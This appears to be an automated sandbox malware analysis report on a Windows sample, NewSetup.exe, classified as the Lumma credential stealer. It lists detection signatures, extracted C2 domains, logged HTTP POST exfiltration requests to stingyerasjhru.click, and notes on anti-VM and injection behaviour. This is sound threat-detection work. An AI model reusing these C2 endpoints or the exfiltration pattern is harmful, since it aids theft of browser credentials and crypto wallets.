Windows Analysis Report
NewSetup.exe

Overview

General Information

Sample name: NewSetup.exe
Analysis ID: 1581500
MD5: e8c9377a0dddc131e2291c3d7f4d69ed
SHA1: c82b6d704cf41a98df3dd576a3a75093d89f0637
SHA256: 4e88703d3aafd146935f551706c7691c36cb34efd05d874c8ea0d49933702446
Tags: exe, LummaStealer, signed, user-ventoy

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • NewSetup.exe (PID: 6532 cmdline: "C:\Users\user\Desktop\NewSetup.exe" MD5: E8C9377A0DDDC131E2291C3D7F4D69ED)
    • conhost.exe (PID: 5940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • NewSetup.exe (PID: 5680 cmdline: "C:\Users\user\Desktop\NewSetup.exe" MD5: E8C9377A0DDDC131E2291C3D7F4D69ED)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["hummskitnj.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "scentniej.buzz", "appliacnesot.buzz", "stingyerasjhru.click", "inherineau.buzz", "cashfuzysao.buzz", "screwamusresz.buzz"], "Build id": "pqZnKP--bW9vbnp6eG"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
Process Memory Space: NewSetup.exe PID: 5680 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: NewSetup.exe PID: 5680 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: NewSetup.exe PID: 5680 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T22:39:57.639998+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49709 | 172.67.157.249 | 443 | TCP
2024-12-27T22:39:59.643972+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49710 | 172.67.157.249 | 443 | TCP
2024-12-27T22:40:02.028641+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49711 | 172.67.157.249 | 443 | TCP
2024-12-27T22:40:04.493219+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49713 | 172.67.157.249 | 443 | TCP
2024-12-27T22:40:06.968159+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49714 | 172.67.157.249 | 443 | TCP
2024-12-27T22:40:09.559896+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49724 | 172.67.157.249 | 443 | TCP
2024-12-27T22:40:13.103475+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49732 | 172.67.157.249 | 443 | TCP
2024-12-27T22:40:16.063147+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49743 | 172.67.157.249 | 443 | TCP
2024-12-27T22:39:58.376516+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49709 | 172.67.157.249 | 443 | TCP
2024-12-27T22:40:00.414616+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49710 | 172.67.157.249 | 443 | TCP
2024-12-27T22:39:58.376516+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49709 | 172.67.157.249 | 443 | TCP
2024-12-27T22:40:00.414616+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.6 | 49710 | 172.67.157.249 | 443 | TCP
2024-12-27T22:40:03.154379+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49711 | 172.67.157.249 | 443 | TCP

AV Detection

Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["hummskitnj.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "scentniej.buzz", "appliacnesot.buzz", "stingyerasjhru.click", "inherineau.buzz", "cashfuzysao.buzz", "screwamusresz.buzz"], "Build id": "pqZnKP--bW9vbnp6eG"}
Source: NewSetup.exe | ReversingLabs: Detection: 36%
Source: NewSetup.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp | String decryptor: hummskitnj.buzz
Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp | String decryptor: cashfuzysao.buzz
Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp | String decryptor: appliacnesot.buzz
Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp | String decryptor: screwamusresz.buzz
Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp | String decryptor: inherineau.buzz
Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp | String decryptor: scentniej.buzz
Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp | String decryptor: rebuildeso.buzz
Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp | String decryptor: prisonyfork.buzz
Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp | String decryptor: stingyerasjhru.click
Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp | String decryptor: pqZnKP--bW9vbnp6eG
Source: NewSetup.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 0_2_00231F38 FindFirstFileExW, | 0_2_00231F38
Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 0_2_00231FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose, | 0_2_00231FE9
Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_2_00231F38 FindFirstFileExW, | 3_2_00231F38
Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_2_00231FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose, | 3_2_00231FE9
Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h | 3_2_0043F080
Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx] | 3_2_0043D929
Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 4x nop then mov ecx, eax | 3_2_004269E0

Networking

Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49710 -> 172.67.157.249:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 172.67.157.249:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49711 -> 172.67.157.249:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49709 -> 172.67.157.249:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 172.67.157.249:443
Source: Malware configuration extractor | URLs: hummskitnj.buzz
Source: Malware configuration extractor | URLs: rebuildeso.buzz
Source: Malware configuration extractor | URLs: prisonyfork.buzz
Source: Malware configuration extractor | URLs: scentniej.buzz
Source: Malware configuration extractor | URLs: appliacnesot.buzz
Source: Malware configuration extractor | URLs: stingyerasjhru.click
Source: Malware configuration extractor | URLs: inherineau.buzz
Source: Malware configuration extractor | URLs: cashfuzysao.buzz
Source: Malware configuration extractor | URLs: screwamusresz.buzz
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49711 -> 172.67.157.249:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49724 -> 172.67.157.249:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 172.67.157.249:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49709 -> 172.67.157.249:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49743 -> 172.67.157.249:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49714 -> 172.67.157.249:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49732 -> 172.67.157.249:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 172.67.157.249:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: stingyerasjhru.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 52; Host: stingyerasjhru.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=POWTP03AGWE65AD7T; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 12858; Host: stingyerasjhru.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=849Y6J9LFXVPBSNM0J; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 15110; Host: stingyerasjhru.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=HBDVBRQF; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 19908; Host: stingyerasjhru.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=EI81MX42T8TGW0ASOT7; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 1237; Host: stingyerasjhru.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=EDIB75P7HSSY7A9WE; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 588331; Host: stingyerasjhru.click
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: stingyerasjhru.click
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: stingyerasjhru.click
Source: NewSetup.exe | String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: NewSetup.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: NewSetup.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: NewSetup.exe | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: NewSetup.exe | String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: NewSetup.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: NewSetup.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: NewSetup.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: NewSetup.exe | String found in binary or memory: http://ocsp.digicert.com0
Source: NewSetup.exe | String found in binary or memory: http://ocsp.digicert.com0A
Source: NewSetup.exe | String found in binary or memory: http://ocsp.entrust.net02
Source: NewSetup.exe | String found in binary or memory: http://ocsp.entrust.net03
Source: NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: NewSetup.exe | String found in binary or memory: http://www.digicert.com/CPS0
Source: NewSetup.exe | String found in binary or memory: http://www.entrust.net/rpa03
Source: NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: NewSetup.exe, 00000003.00000003.2217523568.0000000005A0E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: NewSetup.exe, 00000003.00000002.2323001523.0000000005A0C000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292481994.0000000005A0C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&
Source: NewSetup.exe, 00000003.00000003.2240282371.0000000005A0C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: NewSetup.exe, 00000003.00000003.2217523568.0000000005A0E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: NewSetup.exe, 00000003.00000003.2217523568.0000000005A0E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: NewSetup.exe, 00000003.00000003.2217523568.0000000005A0E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: NewSetup.exe, 00000003.00000003.2240923981.000000000346B000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2241770608.00000000059F4000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2216181199.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2215827974.00000000059F1000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243516642.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292228266.000000000346B000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2167189343.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2167189343.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2275459919.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2317817416.000000000346B000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240412235.00000000059F3000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243756050.0000000005A01000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240356091.0000000003467000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2215760956.000000000346A000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2273925137.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2217240190.00000000059F4000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2275417498.000000000346B000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stingyerasjhru.click/
Source: NewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stingyerasjhru.click/9
Source: NewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2275459919.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2273925137.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stingyerasjhru.click/CTb
Source: NewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240939627.00000000059FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stingyerasjhru.click/a
Source: NewSetup.exe, 00000003.00000003.2318157969.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322348607.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322348607.00000000033AB000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2167189343.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243462732.000000000344D000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2274098890.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292186863.000000000344D000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243225277.000000000344D000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292319702.000000000344D000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2273866612.000000000344D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://stingyerasjhru.click/api
Source: NewSetup.exe, 00000003.00000002.2322348607.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292186863.000000000344D000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292319702.000000000344D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://stingyerasjhru.click/api5
Source: NewSetup.exe, 00000003.00000003.2167294440.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2167189343.00000000033CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://stingyerasjhru.click/api:
Source: NewSetup.exe, 00000003.00000003.2167189343.00000000033F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://stingyerasjhru.click/apiJa
Source: NewSetup.exe, 00000003.00000003.2292186863.000000000344D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://stingyerasjhru.click/apiT
Source: NewSetup.exe, 00000003.00000002.2322348607.0000000003436000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://stingyerasjhru.click/apif#
Source: NewSetup.exe, 00000003.00000002.2322348607.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292186863.000000000344D000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292319702.000000000344D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://stingyerasjhru.click/apil6
Source: NewSetup.exe, 00000003.00000003.2273866612.000000000344D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://stingyerasjhru.click/apiok
Source: NewSetup.exe, 00000003.00000003.2273866612.000000000344D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://stingyerasjhru.click/apiox
Source: NewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stingyerasjhru.click/b
Source: NewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2241164394.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240939627.00000000059FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stingyerasjhru.click/bUT
